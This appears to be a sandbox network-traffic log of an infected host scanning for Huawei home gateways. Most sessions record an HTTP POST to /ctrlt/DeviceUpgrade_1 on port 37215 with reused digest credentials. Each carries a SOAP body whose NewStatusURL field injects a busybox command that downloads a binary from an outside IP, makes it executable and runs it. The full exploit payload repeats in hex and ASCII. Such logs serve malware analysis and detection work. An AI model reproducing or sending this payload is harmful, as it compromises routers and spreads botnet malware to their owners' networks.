                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1307192.168.2.1538068197.92.187.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730549097 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1308192.168.2.1553224197.140.200.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730571985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1309192.168.2.1558582197.224.24.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730585098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1310192.168.2.1555912197.151.109.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730603933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1311192.168.2.1545192197.244.239.6137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730628014 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1312192.168.2.1535080197.104.124.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730664968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1313192.168.2.1541396197.29.132.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730667114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1314192.168.2.1547284197.229.236.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730693102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1315192.168.2.1559966197.10.220.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730693102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1316192.168.2.1559094197.147.77.11337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.730721951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 